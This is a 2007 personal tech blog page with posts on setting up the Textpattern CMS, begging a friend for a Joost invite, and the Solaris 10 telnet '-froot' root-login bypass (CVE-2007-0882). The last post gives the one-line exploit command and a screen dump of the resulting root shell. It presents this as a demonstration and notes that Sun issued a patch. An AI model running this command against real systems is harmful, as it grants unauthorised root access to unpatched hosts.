Tuesday, May 29, 2007

Textpattern : the CMS

I had choosed textpattern for the site GoWayanad.com after comparing various CMSes. I found that TXP aka textpattern to be pretty neat and light weight. It doesn't have all those flashy features other CMSes like Joomla offer. But since the site is going to static, I won't be needing all those flashy features. And ofcourse, as the number of lines of code increases the bugs also increases.

Anyway I had to burn high amounts of brain fuel to get used to Textpattern. Getting used to writing articles, the concept of presentation, content, forms etc were very confusing in the beginning.

Given below are few links which gave me the basic understanding of TXP

Then I noticed that Firefox is not auto detecting the RSS feed. How to make feed aggregators auto detect the textpattern RSS feed ? I googled and there were no proper results. anyway, I noted that the directive

<link rel="alternate" type="application/rss+xml" title="rss" 
href="http://gowayanad.com/index.php?rss=1" />

is missing in the 'head' section. Added it in the head section of the presentation > Pages I am using and it started working.

Helpful FAQ : http://textpattern.com/faq/280/troubleshooting-feed-issues

(I will keep updating this blog post with various tips and tricks regarding textpattern. )
Posted by at 1 comment:

Thursday, May 3, 2007

i bend my knees infront of thee and beg for joost invite

Joost is a internet (P2P) TV application. Its a startup floated by the co-founders of Skype and kaaza. Following Gmail they are using "invitation only" marketing campaign.

And its very difficult to get an invite. Check the chat I had a with a friend ;-)

me: wats ur stat ? ( status in google talk)

galexy: search joost

me: hmmm
 invite undel thaaa ;-)
( translates to : please please give me an invite)
i will try
is it good ?
galexy: NO WAY
u have to go down on your knees and beg
me: im doing it
galexy: i am not seeing it :D
desperate me: oh i bend my knees infront of thee and beg for joost.

galexy: :)

ok.. and u shall be called bandipur bayangaran

poor me: as u wish ...
any more wishes ?

galexy: nope
me: then u should act ...
galexy: giving it

Finally I my dear friend 'galexy' [g :-) ] sends me a joost invite and I got the app downloaded. (There is a desktop client which will stream the media from the network. Sadly GNU/Linux is not supported!) But looks like they haven't added HTTP proxy support. Looks like its tricky to support proxies as the application uses P2P networks.

The error message I got was quite funny. It said: 'You seem to be connecting internet via something called a "proxy" '















(Well, I hope I could properly configure the NAT at my home and get rid of the Squid proxy - thanks to the sify internet connection(?) I am using)
Posted by at 1 comment:

Tuesday, May 1, 2007

Inbuilt vulnerabiliy support !

I have been thinking about starting a technical blog for quite sometime. And I am excited to start with writing about security. From the early days at college, I was told that getting root / administrator is the biggest thing a computer engineer can do and some of my friends were successful enough to crack a Novel Netware network and use it for getting some pr0n. Finally one hell of a anti-cracker caught them, 'disassembled and analysed' the whole .EXE file they used to crack the Novel Netware and suspended them from the lab. (The anti-cracker had used a tool called Turbo Disassembler to do the magic.) Now please don't ask me how he managed to do that. I am trying to figure out that for years and once I understand how to do that, I will go to Himalayas and spend rest of my life as a sadhu ! (some snaps) And then there was another guy who told me that copying and pasting the GNU/Linux boot messages to some file will solve all the X related issues in RedHat 7.0. (LOL ! I hope he will be reading this.)

Ok :-) Thats old story about getting root.

Recently I happened to check a Solaris 10 box. This version of operating system comes with an interesting zero-day bug.

Try "telnet -l '-froot' IP" and you can login to a Solaris 10 box without a password !

I know, no one is going to believe this. so I have added the screen dump below:


[~]$telnet -l '-froot' IP
Trying IP...
Connected to IP(IP).
Escape character is '^]'.
Last login: Wed Apr 19 00:28:17 from IP
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have new mail.
# bash


Ok, lets try a cat /etc/release

bash-3.00# cat /etc/re
reboot release remote
bash-3.00# cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006


Still not convinced ?


bash-3.00# id
uid=0(root) gid=0(root)
bash-3.00#

Oh yea !!! You can login without a root password !

btw what is this '-f ' option ?

GNU/Linux man page says "If Kerberos V5 authentication is being used, the -f option allows the local credentials to be forwarded to the remote system."

Details: CVE-2007-0882 (the telnet "-froot" bug)

The Register has an article here

Sun has announced a workaround and a patch for it.
Posted by at No comments:
Subscribe to: Posts (Atom)